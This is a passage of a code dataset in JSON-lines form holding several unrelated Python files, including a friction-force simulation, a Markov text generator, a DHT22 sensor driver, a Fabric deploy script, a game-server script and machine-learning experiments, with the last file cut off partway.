F_FL=F_FLm=M_FL=M_FLm=F_FR=F_FRm=M_FR=M_FRm=0\n #}\n \n #===========================================================================\n #{ LEFT start\n \n # Vertical Reaction should be positive\n if F_VL>0: \n \n # Relative Velocity\n xi_L = DU - ( H * cos( R ) - A * sin( R ) ) * DR\n if L!=1:\n xi_L -= DUm + ( Hm * cos( Rm ) + A * sin( Rm ) ) * DRm\n else:\n xi_L -= DUm\n \n # Relative Velocity should be nonzero\n if xi_L!=0:\n \n # Friction Force: F_FL \n if abs(xi_L) <= xi_F_cr:\n # Viscous Slip Condition\n F_FL = - mu_s * F_VL * xi_L / xi_F_cr\n else:\n # Slip Condition\n mu = mu_k + (mu_s - mu_k) * exp( -d_mu*(abs(xi_L)-xi_F_cr) )\n F_FL = - (+(xi_L>0) or -(xi_L<0)) * mu * F_VL\n \n # Other Forces & Moments: F_FLm, M_FL, M_FLm\n F_FLm = -F_FL\n M_FL = -F_FL * ( H * cos( R ) - A * sin( R ) )\n if L!=1:\n M_FLm = F_FLm * ( Hm * cos( Rm ) + A * sin( Rm ) )\n \n # Check Point: xi==0 -> Do nothing\n \n # Check Point: F_VL<=0 -> Do nothing\n \n \n # LEFT end\n #}===========================================================================\n \n \n #===========================================================================\n #{ RIGHT start\n \n # Vertical Reaction should be positive\n if F_VR>0: \n \n # Relative Velocity\n xi_R = DU - ( H * cos( R ) + A * sin( R ) ) * DR\n if L!=1:\n xi_R -= DUm + ( Hm * cos( Rm ) - A * sin( Rm ) ) * DRm\n else:\n xi_R -= DUm\n \n # Relative Velocity should be nonzero\n if xi_R!=0:\n \n # Friction Force: F_FR \n if abs(xi_R) <= xi_F_cr:\n # Viscous Slip Condition\n F_FR = - mu_s * F_VR * xi_R / xi_F_cr\n else:\n # Slip Condition\n mu = mu_k + (mu_s - mu_k) * exp( -d_mu*(abs(xi_R)-xi_F_cr) )\n F_FR = - (+(xi_R>0) or -(xi_R<0)) * mu * F_VR\n \n # Other Forces & Moments: F_FRm, M_FR, M_FRm\n F_FRm = -F_FR\n M_FR = -F_FR * ( H * cos( R ) + A * sin( R ) )\n if L!=1:\n M_FRm = F_FRm * ( Hm * cos( Rm ) - A * sin( Rm ) )\n \n # Check Point: xi==0 -> Do nothing\n \n # Check Point: F_VR<=0 -> Do nothing\n \n \n # RIGHT end\n #}===========================================================================\n \n #{ Assemble Accel\n AccelF = (F_FL + F_FR ) / M\n AccelM = (M_FL + M_FR ) / I\n AccelFm = -(F_FL + F_FR ) / Mm\n AccelMm = (M_FLm + M_FRm) / Im\n \n # Add Accel on (K,L)\n IndexW = Core['Index'][K][L]*6\n Accel[IndexW+1] += AccelF # DDU\n Accel[IndexW+5] += AccelM # DDR\n \n # Add Accel on (K,L-1)\n \n if L!=1: # Normal Blocks\n IndexWm = Core['Index'][K][L-1]*6\n Accel[IndexWm+1] += AccelFm # DDU\n Accel[IndexWm+5] += AccelMm # DDR\n \n elif Core['Flag_CSB']==True: # Add Accel on CSB\n#(v04f) IndexWm = Core['Index'][K][L-1]*6\n IndexWm = Core['Index'][1][0]*6\n Accel[IndexWm+1] += AccelFm # DDU\n pass # No moment on CSB\n \n else: pass # if Base: Do nothing\n #}\n\n #{ VERBOSE\n if '/ForceVF/' in VERBOSE:\n Verbose('-'*80)\n Verbose('Force_Block_V_F(), Friction Caculation Verification')\n Verbose('Block (%d,%d)'%(K,L))\n Verbose('U, DU, W, DW, R, DR = %e, %e, %e, %e, %e, %e'%(U,DU,W,DW,R,DR))\n Verbose('Um,DUm,Wm,DWm,Rm,DRm = %e, %e, %e, %e, %e, %e'%(Um,DUm,Wm,DWm,Rm,DRm))\n Verbose('xi = %e, %e'%(xi_L,xi_R))\n Verbose('FF = %e, %e'%(F_FL,F_FR))\n Verbose('MF = %e, %e, %e, %e'%(M_FL,M_FR,M_FLm,M_FRm))\n Verbose('Accel(%d,%d) = %e, %e'%(K,L,AccelF,AccelM))\n Verbose('Accel[%d] = %e'%(IndexW+1,Accel[IndexW+1]))\n Verbose('Accel[%d] = %e'%(IndexW+5,Accel[IndexW+5]))\n if L!=1:\n Verbose('Accel(%d,%d) = %e, %e'%(K,L-1,AccelFm,AccelMm))\n Verbose('Accel[%d] = %e'%(IndexWm+1,Accel[IndexWm+1]))\n Verbose('Accel[%d] = %e'%(IndexWm+5,Accel[IndexWm+5]))\n #}\n\n #{ POST\n if POST==True:\n temp = '%e, '%t\n temp += '%e, %e, %e, %e, '%( xi_L, F_FL, M_FL, M_FLm )\n temp += '%e, %e, %e, %e '%( xi_R, F_FR, M_FR, M_FRm )\n temp += '\\n'\n fo = open(FO_DIR+'/(%2d,%2d)_VF.csv'%(K,L),'a')\n fo.write(temp)\n fo.close()\n #}\n\n \n #}\n \n \n# #\n# #\n# FRICTION FORCES #\n#}############################################################################\n\n\n # END\n return Accel\n#}\n#-------------------------------------------------------------------------\n","sub_path":"SAPCOR_v04h_Force_Block_V_F_Build004.py","file_name":"SAPCOR_v04h_Force_Block_V_F_Build004.py","file_ext":"py","file_size_in_byte":12892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"143587971","text":"import random\n# 마르코프 체인 딕셔너리 만들기 --- (※1)\ndef make_dic(words):\n tmp = [\"@\"]\n dic = {}\n for word in words:\n tmp.append(word)\n if len(tmp) < 3: continue\n if len(tmp) > 3: tmp = tmp[1:]\n set_word3(dic, tmp)\n if word == \".\":\n tmp = [\"@\"]\n continue\n return dic\n# 딕셔너리에 데이터 등록하기 --- (※2)\ndef set_word3(dic, s3):\n w1, w2, w3 = s3\n if not w1 in dic: dic[w1] = {}\n if not w2 in dic[w1]: dic[w1][w2] = {}\n if not w3 in dic[w1][w2]: dic[w1][w2][w3] = 0\n dic[w1][w2][w3] += 1\n# 문장 만들기 --- (※3)\ndef make_sentence(dic):\n ret = []\n if not \"@\" in dic: return \"no dic\" \n top = dic[\"@\"]\n w1 = word_choice(top)\n w2 = word_choice(top[w1])\n ret.append(w1)\n ret.append(w2)\n while True:\n w3 = word_choice(dic[w1][w2])\n ret.append(w3)\n if w3 == \".\": break\n w1, w2 = w2, w3\n ret = \" \".join(ret)\n \n return ret\n\ndef word_choice(sel):\n keys = sel.keys()\n return random.choice(list(keys))","sub_path":"tutorials/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344903626","text":"import itertools\nimport operator\n\n# itertools.acumulate(iterable[, func])\n\n\"\"\"\nMnoży przez siebie liczby z listy data.\n\"\"\"\n\ndata = [1,2,3,4,5]\n\nresult = itertools.accumulate(data, operator.mul)\nfor each in result:\n print(each)\n\nprint('-'*30)\n# itertools.count(start=0, step = 1)\n\n\"\"\"\nod 10 zwiększa o 3\n\"\"\"\n\nfor i in itertools.count(10,3):\n print(i)\n if i > 20:\n break\n\nprint('-'*30)\n\n# itertools.cycle(iterable)\n\n\"\"\"\nPrzechodzi przez obiekt w nieskonczonosc\n\"\"\"\n\nmonth = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\n# for m in itertools.cycle(month):\n# print(m)\n#\n\n# itertiiks,chain(*\n","sub_path":"venv/Include/Funkcje-scenariusze zastosowań/itertools przegląd.py","file_name":"itertools przegląd.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"290366881","text":"import re\nfrom typing import Tuple, Callable, Iterable, Optional\nimport sys\nfname=sys.argv[1] if len(sys.argv)>1 else \"input2\"\nf = open(fname)\nftext=f.read()\nf=[line.strip() for line in ftext.split(\"Blueprint\")[1:]]\n\nfrom collections import defaultdict\n\nd=defaultdict(int)\n\n#copied from https://github.com/joefarebrother/adventofcode/blob/master/misc_utils.py\ndef lmap(f: Callable, *xs) -> list:\n \"\"\"Like map but returns a list\"\"\"\n return list(map(f, *xs))\n\ndef ints(xs: Iterable) -> list[int]:\n \"\"\"Casts each element of xs to an int\"\"\"\n return lmap(int, xs)\n\ndef mint(x, default=None):\n \"\"\"Maybe int - casts to int and returns default on failure\"\"\"\n try:\n return int(x)\n except ValueError:\n return default\n\ndef ints_in(x: str) -> list[int]:\n \"\"\"Finds and parses all integers in the string x\"\"\"\n ex = r'(?:(?20:\n print(t,costs,mm,rs)\n if t<=1:#robots built now don't count\n return 0\n mx = 0\n #if all(a=max(costs[i][0] for i in range(1,4)):\n continue\n if 5-ix>t:\n continue\n if any (costs[ix][i]>0 and rs[i]==0 for i in range(1,3)):\n continue\n #print(costs[ix],ix,rs,mm)\n tt = 1 + max( 1+((max(0,costs[ix][i]-mm[i])-1)//rs[i]) for i in range(3) if costs[ix][i]>0)\n rs_ = Pt(x+(j==ix) for j,x in enumerate(rs))\n #print(tt)\n #if t>12:\n #print(t,tt,ix,costs[ix], )\n #print(t-tt,mm+(tt*rs)-costs[ix],rs_)\n #print(best(costs,t-tt,mm+(tt*rs)-costs[ix],rs_) + (t-tt)*(ix==4))\n mx = max(mx, best(costs,t-tt,mm+(tt*rs)-costs[ix],rs_) + (t-tt)*(ix==3))\n\n cache[(t,mm,rs)]=mx\n return mx\n\n# how many of each robot to build\ndef instrs(costs,ins):\n ix = 0\n rs = [1,0,0,0]\n mm=[0,0,0,0]\n for i in range(24):\n #print(mm)\n nr=[0,0,0,0]\n while True:\n if ins[ix]==0:\n ix+=1\n continue\n if any(c>m for c,m in zip(costs[ix],mm)):\n break\n ins[ix]-=1\n nr[ix]+=1\n for k in range(4):\n mm[k]-=costs[ix][k]\n for k in range(4):\n mm[k]+=rs[k]\n rs[k]+=nr[k]\n print(i+1,mm,rs)\n return mm[-1]\n\ndef fa(costs):\n rs = [1,0,0,0]\n mm=[0,0,0,0]\n for i in range(24):\n nr=[0,0,0,0]\n for k in range(3,0,-1):\n if rs[k-1]==0:\n continue\n #costs[k]/\n while True:\n if ins[ix]==0:\n ix+=1\n continue\n if any(c>m for c,m in zip(costs[ix],mm)):\n break\n ins[ix]-=1\n nr[ix]+=1\n for k in range(4):\n mm[k]-=costs[ix][k]\n for k in range(4):\n mm[k]+=rs[k]\n rs[k]+=nr[k]\n print(i+1,mm,rs)\n return mm[-1]\n \n\n\nl=[]\nprint(\"here\")\n\"\"\"\nfor a,cs in enumerate(bps):\n mx=0\n for i in range(4,5):\n for j in range(2,3):\n things = [0,i,j,100]\n v = instrs(cs,list(things))\n print(i,j,v)\n \n mx=max(mx,v)\n l.append((a+1)*mx)\n print(l[-1])\n\"\"\"\nfor a,cs in enumerate(bps):\n if a<3:\n l.append(best(cs))\n print(l[-1])\n cache={}\np=1\nfor x in l:\n p*=x\nprint(p)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"19/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37730981","text":"'''\nCreated on 16/03/2015\n\n@author: Junior Mascarenhas\n'''\nimport RPi.GPIO as GPIO\nfrom abstractclass.humiditySensor import HumiditySensor\nimport atexit\nimport pigpio\nimport time\n\nclass DHT22Humidity(HumiditySensor):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n HumiditySensor.__init__(self)\n self.setup()\n\n def setup(self):\n \"\"\"\n Setup the board and GPIO \n @return: void\n \"\"\"\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n self.__pin = 23\n self.__data = []\n self.__crc = \"\"\n self.__humidity = \"\"\n self.__temperature = \"\"\n self.cb = None\n\n atexit.register(self.__cancel)\n\n self.bad_CS = 0 # Bad checksum count.\n self.bad_SM = 0 # Short message count.\n self.bad_MM = 0 # Missing message count.\n self.bad_SR = 0 # Sensor reset count.\n\n # Power cycle if timeout > MAX_TIMEOUTS.\n self.no_response = 0\n self.MAX_NO_RESPONSE = 2\n\n self.rhum = -999\n self.temp = -999\n\n self.tov = None\n\n self.high_tick = 0\n self.bit = 40\n self.pi = pigpio.pi()\n self.pi.set_pull_up_down(self.__pin, pigpio.PUD_OFF)\n\n self.pi.set_watchdog(self.__pin, 0) # Kill any watchdogs.\n\n self.cb = self.pi.callback(self.__pin, pigpio.EITHER_EDGE, self.__cb)\n\n def changeSetup(self, pin):\n \"\"\"\n @param pin: the GPIO pin used to wire the sensor.\n @return: void\n \"\"\"\n self.__pin = pin\n\n def __cb(self, pin, level, tick):\n \"\"\"\n Accumulate the 40 data bits. Format into 5 bytes, humidity high,\n humidity low, temperature high, temperature low, checksum.\n @param pin: the pin used to read data\n @type pin: int8\n @param level: the level\n @type level: int8\n @param tick: Tick used to diff\n @type tick: int8\n \"\"\"\n \n diff = pigpio.tickDiff(self.high_tick, tick)\n\n if level == 0:\n # Edge length determines if bit is 1 or 0.\n if (diff >= 50):\n val = 1\n if (diff >= 200): # Bad bit?\n self.CS = 256 # Force bad checksum.\n else:\n val = 0\n if (self.bit >= 40): # Message complete.\n self.bit = 40\n elif (self.bit >= 32): # In checksum byte.\n self.CS = (self.CS << 1) + val\n if (self.bit == 39):\n # 40th bit received.\n self.pi.set_watchdog(self.__pin, 0)\n self.no_response = 0\n total = self.hH + self.hL + self.tH + self.tL\n if ((total & 255) == self.CS): # Is checksum ok?\n self.rhum = ((self.hH << 8) + self.hL) * 0.1\n if (self.tH & 128): # Negative temperature.\n mult = -0.1\n self.tH = self.tH & 127\n else:\n mult = 0.1\n self.temp = ((self.tH << 8) + self.tL) * mult\n self.tov = time.time()\n else:\n self.bad_CS += 1\n elif (self.bit >= 24): # in temp low byte\n self.tL = (self.tL << 1) + val\n elif (self.bit >= 16): # in temp high byte\n self.tH = (self.tH << 1) + val\n elif (self.bit >= 8): # in humidity low byte\n self.hL = (self.hL << 1) + val\n elif (self.bit >= 0): # in humidity high byte\n self.hH = (self.hH << 1) + val\n else: # header bits\n pass\n self.bit += 1\n elif (level == 1):\n self.high_tick = tick\n if (diff > 250000):\n self.bit = -2\n self.hH = 0\n self.hL = 0\n self.tH = 0\n self.tL = 0\n self.CS = 0\n else: # level == pigpio.TIMEOUT:\n self.pi.set_watchdog(self.__pin, 0)\n if (self.bit < 8): # Too few data bits received.\n self.bad_MM += 1 # Bump missing message count.\n self.no_response += 1\n if (self.no_response > self.MAX_NO_RESPONSE):\n self.no_response = 0\n self.bad_SR += 1 # Bump sensor reset count.\n elif (self.bit < 39): # Short message receieved.\n self.bad_SM += 1 # Bump short message count.\n self.no_response = 0\n else: # Full message received.\n self.no_response = 0\n\n def getHumidity(self):\n \"\"\"\n Gets the humidity from the sensor\n @return: The humidity read\n @rtype: float\n \"\"\"\n self.__trigger()\n time.sleep(0.2)\n self.cb = self.pi.callback(self.__pin, pigpio.EITHER_EDGE, self.__cb)\n return self.rhum\n\n def __trigger(self):\n \"\"\"Trigger a new relative humidity and temperature reading.\"\"\"\n self.pi.write(self.__pin, pigpio.LOW)\n time.sleep(0.017) # 17 ms\n self.pi.set_mode(self.__pin, pigpio.INPUT)\n self.pi.set_watchdog(self.__pin, 200)\n\n def __cancel(self):\n \"\"\"Cancel the DHT22 sensor.\"\"\"\n\n self.pi.set_watchdog(self.__pin, 0)\n if (self.cb != None):\n self.cb.cancel()\n self.cb = None\n self.pi.stop()\n","sub_path":"concretesensor/dht22Humidity.py","file_name":"dht22Humidity.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"441073073","text":"#!/usr/bin/env python\nfrom fabric.api import *\n\n# the user to use for the remote commands\nenv.user = 'weehowe-z'\n# the servers where the commands are executed\nenv.hosts = ['sr.delvin.xyz:717']\n\ndef pack():\n # create a new source distribution as tarball\n local('python setup.py sdist --formats=gztar', capture=False)\n\ndef deploy():\n # figure out the release name and version\n dist = local('python setup.py --fullname', capture=True).strip()\n # upload the source tarball to the temporary folder on the server\n put('dist/%s.tar.gz' % dist, '/tmp/sr.tar.gz')\n # create a place where we can unzip the tarball, then enter\n # that directory and unzip it\n sudo('rm -rf /tmp/sr')\n run('mkdir /tmp/sr')\n with cd('/tmp/sr'):\n run('tar xzf /tmp/sr.tar.gz')\n # now setup the package with our virtual environment's\n # run('mv ' + dist + '/*. ')\n # python interpreter\n sudo('cp -r -f /tmp/sr/' + dist + '/app/* /var/www/sr/env/app/')\n with cd ('/var/www/sr/env'):\n sudo('/var/www/sr/env/bin/python ' +'/tmp/sr/'+ dist + '/setup.py install')\n # now that all is set up, delete the folder again\n sudo('rm -rf /tmp/sr /tmp/sr.tar.gz')\n sudo('service apache2 restart')\n # and finally touch the .wsgi file so that mod_wsgi triggers\n # a reload of the application","sub_path":"homepage/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550046571","text":"from dataclasses import dataclass\nfrom jsondataclass import to_dict, DataClassMapper\n\n\n@dataclass\nclass User:\n id: int\n name: str\n\n\nuser = User(1, \"John Doe\")\n\nmapper = DataClassMapper()\ndict_obj = mapper.to_dict(user)\nprint(dict_obj)\n# {'id': 1, 'name': 'John Doe'}\n\n# or\ndict_obj = to_dict(user)\nprint(dict_obj)\n# {'id': 1, 'name': 'John Doe'}\n","sub_path":"examples/to_dict.py","file_name":"to_dict.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"152663945","text":"from src.dimReduction.interfaces.ReductionModel import ReductionModel\nimport numpy as np\nfrom sklearn import preprocessing\n\nclass SVD(ReductionModel):\n def __init__(self, dataMatrix, k=None):\n super(SVD, self).__init__(dataMatrix)\n self.k = k\n\n def getDecomposition(self):\n self.dataMatrix = preprocessing.scale(self.dataMatrix)\n u, s, vt = np.linalg.svd(self.dataMatrix, full_matrices=False)\n s = np.diag(s)\n if self.k is None:\n return u, s, vt\n len = s.shape[0]\n # rank_s = np.linalg.matrix_rank(s)\n # s[(rank_s - self.k):rank_s] = 0\n for i in range(self.k, len):\n s[i, i] = 0\n u=np.matmul(u , s)\n uT = np.transpose(np.matmul(u, s))\n uT = uT[~np.all(uT == 0, axis=1)]\n u = np.transpose(uT)\n\n for i in range(self.k):\n s[i, i] = 1\n vt = np.matmul(s, vt)\n vt = vt[~np.all(vt == 0, axis=1)]\n\n return u, vt\n","sub_path":"src/dimReduction/SVD.py","file_name":"SVD.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463638260","text":"# NATIVE IMPORTS\n\nimport time\nfrom threading import Thread\n\n# GTAORANGE IMPORTS\n\nimport GTAOrange.player as Player\nimport GTAOrange.vehicle as Vehicle\n\n# PRIVATE FUNCTIONS\n\ndef _sendPlayerList(target):\n players = Player.getAll()\n target.chatMsg(\"Players:\")\n\n for player in players.values():\n target.chatMsg(player.getName())\n\n\ndef _threadTest():\n i = 0\n\n while True:\n\n print(i)\n i += 1\n\n time.sleep(1000)\n\n# EVENT HANDLERS\n\ndef _onPlayerConnect(player, ip):\n print('Player:connect | ' + str(player.getName()) + ' | ' + ip)\n\n # on first spawn\n player.setPosition(100.0, -1940.0, 21.0)\n\n # ofc you can define own attributes, as long as they don't replace each other\n player.testveh = None\n\ndef _onPlayerDisconnect(player, reason):\n print('Player:disconnect | ' + str(player.getID()) + ' | ' + str(reason))\n\ndef _onPlayerCommand(player, command):\n print(\"command\")\n command = command.split()\n\n # player commands\n\n if command[0] == \"/setpos\":\n player.setPosition(float(command[1]), float(\n command[2]), float(command[3]))\n\n elif command[0] == \"/players\":\n _sendPlayerList(player)\n\n elif command[0] == \"/getpos\":\n # chat\n x, y, z = player.getPosition()\n player.chatMsg(\"{:.9f}\".format(x) + \"|\" +\n \"{:.9f}\".format(y) + \"|\" + \"{:.9f}\".format(z))\n\n # server console\n coords = player.getPosition()\n print(coords)\n\n # thread example\n\n elif command[0] == \"/thread\":\n t = Thread(target=_threadTest)\n t.daemon = True\n t.start()\n\n # vehicle commands\n\n elif command[0] == \"/veh\":\n\n # spawns a Burrito at your position\n if command[1] == \"create\":\n if player.testveh is None:\n x, y, z = player.getPosition()\n\n player.testveh = Vehicle.create(\n \"Burrito\", x, y, z, player.getHeading())\n player.setIntoVeh(player.testveh)\n\n player.chatMsg(\"Created a Burrito! :-) | ID: \" +\n str(player.testveh.id))\n else:\n player.chatMsg(\"Please delete your car before!\")\n\n # deletes the Burrito you've spawned\n elif command[1] == \"delete\":\n if player.testveh is not None:\n player.testveh.delete()\n player.testveh = None\n else:\n player.chatMsg(\"Please create a car before!\")\n\n # sends position of Burrito to chat and server console\n elif command[1] == \"getpos\":\n if player.testveh is not None:\n # chat\n x, y, z = player.testveh.getPosition()\n player.chatMsg(\"{:.9f}\".format(x) + \"|\" + \"{:.9f}\".format(y) + \"|\" + \"{:.9f}\".format(z))\n\n # server console\n val = player.testveh.getPosition()\n print(val)\n else:\n player.chatMsg(\"Please create a car before!\")\n\n else:\n print(' '.join(command))\n\n return True\n\n\ndef _onPlayerEnteredVehicle(player, veh):\n print('Vehicle:playerentered | ' +\n str(player.getID()) + ' | ' + str(veh.getID()))\n\n\ndef _onPlayerLeftVehicle(player, veh):\n print('Vehicle:playerleft | ' + str(player.getID()) + ' | ' + str(veh.getID()))\n\n\n# REGISTER EVENT HANDLERS\n\nPlayer.on(\"connect\", _onPlayerConnect)\nPlayer.on(\"disconnect\", _onPlayerDisconnect)\nPlayer.on(\"command\", _onPlayerCommand)\n\nVehicle.on(\"playerentered\", _onPlayerEnteredVehicle)\nVehicle.on(\"playerleft\", _onPlayerLeftVehicle)\n","sub_path":"resources/python_example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326796514","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n\n\n# Call function SURF\ndef SURF():\n # Initiate SURF detector\n SURF = cv2.xfeatures2d.SURF_create()\n\n return SURF\n\nimgpath1 = \"image1.jpg\"\nimgpath2 = \"image2.jpg\"\n\n# Open and Convert the input image from BGR to GRAYSCALE\nimage1 = cv2.imread(filename = imgpath1,\n flags = cv2.IMREAD_GRAYSCALE)\nimage2 = cv2.imread(filename = imgpath2,\n flags = cv2.IMREAD_GRAYSCALE)\n\nnormType = cv2.NORM_L2\nsurf_object = SURF()\n\nkp1, des1 = surf_object.detectAndCompute(image1,None)\nkp2, des2 = surf_object.detectAndCompute(image2,None)\n\n# Create BFMatcher object\n\"\"\"\nBrute-force descriptor matcher.\n\nFor each descriptor in the first set, this matcher finds the closest descriptor in the second set by trying each one. This descriptor matcher supports masking permissible matches of descriptor sets.\n\n\"\"\"\nBFMatcher = cv2.BFMatcher(normType = normType,\n crossCheck = True)\n\n# Matching descriptor vectors using Brute Force Matcher\nmatches = BFMatcher.match(queryDescriptors = des1,\n trainDescriptors = des2)\n\n# Sort them in the order of their distance\nmatches = sorted(matches, key = lambda x: x.distance)\n\noutput = cv2.drawMatches(img1 = image1,\n keypoints1 = kp1,\n img2 = image2,\n keypoints2 = kp2,\n matches1to2 = matches[:30],\n outImg = None,\n flags = cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\n\ncv2.imwrite('orb_output.jpg', output)","sub_path":"04_feature_matching_surf.py","file_name":"04_feature_matching_surf.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213621077","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras.models import load_model\n\nfrom random_search_lion_king import random_search\n\n# Importing data\ntrain_dataset = pd.read_csv(r'data/Workflow_new_SP_DR_shiny_FS_train_dataset.csv')\ntest_dataset = pd.read_csv(r'data/Workflow_new_SP_DR_shiny_FS_test_dataset.csv')\nfull_dataset = pd.concat([train_dataset, test_dataset], axis=0)\n\ncols_to_drop = [\n 'GRID_ID', 'Label', 'Signatory_NO_errors_last_5_days',\n 'Signatory_NO_cases_last_5_days', 'Signatory_NO_errors_last_month',\n 'Signatory_NO_cases_month']\n\ntrain_data = train_dataset.drop(cols_to_drop, axis=1)\ntest_data = test_dataset.drop(cols_to_drop, axis=1)\ntrain_labels = train_dataset.pop('Label')\ntest_labels = test_dataset.pop('Label')\n# train_id = train_dataset.pop('GRID_ID')\n# test_id = test_dataset.pop('GRID_ID')\n\n# Get output\nmodels_list, output_table = random_search(\n train_data, train_labels, test_data, test_labels,\n max_iter=1000, max_hours=3.5, min_auc=0.65, max_overfit_auc=0.05)\n\n# Compare results with the best model so far\nbest_model = load_model(r'final_model_DR.h5')\ntrain_predictions = best_model.predict(train_data)\ntest_predictions = best_model.predict(test_data)\n# Check auc scores of best model without cross validation\nauc_train = roc_auc_score(train_labels, train_predictions)\nauc_test = roc_auc_score(test_labels, test_predictions)\n\n# Best model cross validation on full dataset (union on train & test)\nfull_data = full_dataset.drop(cols_to_drop, axis=1)\nfull_labels = full_dataset.pop('Label')\n# full_id = full_id.pop('GRID_ID')\n\nseed = np.random.RandomState(0)\n# Stratified KFold validation\nstr_kfold_auc_scores = []\nstr_kf = StratifiedKFold(n_splits=5, random_state=seed, shuffle=True)\nfor train_index, test_index in str_kf.split(full_data, full_labels):\n X_train, y_train = full_data.iloc[train_index], full_labels.iloc[train_index]\n X_test, y_test = full_data.iloc[test_index], full_labels.iloc[test_index]\n history = best_model.fit(X_train, y_train)\n predictions = best_model.predict(X_test)\n str_kfold_auc_scores.append(roc_auc_score(y_test, predictions))\nstr_kfold_auc_mean = np.mean(str_kfold_auc_scores)\nstr_kfold_auc_std = np.std(str_kfold_auc_scores)\n\n# Ordinary KFold cross validation\nkfold_auc_scores = []\ncv = KFold(n_splits=5, random_state=seed, shuffle=True)\nfor train_index, test_index in cv.split(full_data):\n X_test, y_test = full_data.iloc[test_index], full_labels.iloc[test_index]\n history = best_model.fit(X_train, y_train)\n predictions = best_model.predict(X_test)\n kfold_auc_scores.append(roc_auc_score(y_test, predictions))\nkfold_auc_mean = np.mean(kfold_auc_scores)\nkfold_auc_std = np.std(kfold_auc_scores)\n","sub_path":"SKRYPTY/MODELING/scripts/modeling/scripts/archive/lion_king_model_fitting.py","file_name":"lion_king_model_fitting.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"72535119","text":"\"\"\"\n3. Создать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\ncount_line = 0\nsum_pay = 0\n\ntry:\n with open('wokers_data.txt', 'r', encoding='UTF-8') as file:\n\n for strings in file:\n list_splited = strings.split(' ')[1]\n pay = float(list_splited)\n sum_pay += pay\n count_line += 1\n if float(list_splited) < 20000:\n print('Зарплата меньше 20000: ')\n print(strings.split(' ')[0])\n\n mean = sum_pay/count_line\n print(f'Средняя величина дохода: {round(mean, 2)}')\n\n\nexcept IOError:\n print('Input, Output error.')\nexcept ValueError:\n print('Ошибка ввода данных ')","sub_path":"homeworks/les5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"86216775","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport pickle\r\n\r\nfrom exp_parameters import ExpParam\r\nfrom train_vision import create_or_load_vae\r\nfrom gen_raw_data import __observation_update\r\n\r\nfrom A2C.ActorCritic import A2C\r\nfrom A2C.utils.utils import parse_args, create_experiment_dirs\r\n\r\nfrom A2C.utils.utils import encode_data\r\n\r\n\r\ndef main():\r\n # model_name = 'breakout_discrete_BLM64_STD0_lr0.0001_LAT4096(2)_MADE1543847099'\r\n # model_path = 'C:\\\\Users\\\\Toke\\\\Dropbox\\\\MAI\\\\'\r\n\r\n model_name = 'VAEModel'\r\n model_path = 'C:\\\\Users\\\\Vlad-PC\\\\Desktop\\\\'\r\n\r\n model_path += model_name\r\n\r\n latent = [[32 * 128, 2]]\r\n # raw_dim = (210, 160, 3)\r\n # net_dim = (32*4, 32*3, 3)\r\n raw_dim = (84, 84, 4)\r\n net_dim = (84, 84, 4)\r\n\r\n ### Do stuff\r\n exp_param = ExpParam(\r\n lat_type=\"discrete\",\r\n dataset='breakout',\r\n latent=[[32 * 128, 2]],\r\n raw_type=tf.uint8,\r\n raw_dim=raw_dim,\r\n net_dim=net_dim, # very close to org aspect ration\r\n batch_size=2, # for testing\r\n )\r\n\r\n ### Load model\r\n sess_ae, AE, saver = create_or_load_vae(\r\n model_path,\r\n exp_param=exp_param,\r\n critical_load=True)\r\n\r\n\r\n graph_a2c = tf.Graph()\r\n with graph_a2c.as_default():\r\n # tf.reset_default_graph()\r\n\r\n config_args = parse_args()\r\n config = tf.ConfigProto(allow_soft_placement=True,\r\n intra_op_parallelism_threads=config_args.num_envs,\r\n inter_op_parallelism_threads=config_args.num_envs)\r\n\r\n config.gpu_options.allow_growth = True\r\n sess_a2c = tf.Session(config=config)\r\n\r\n config_args.experiment_dir, config_args.summary_dir, config_args.checkpoint_dir, config_args.output_dir, config_args.test_dir = \\\r\n create_experiment_dirs(config_args.experiment_dir)\r\n\r\n a2c 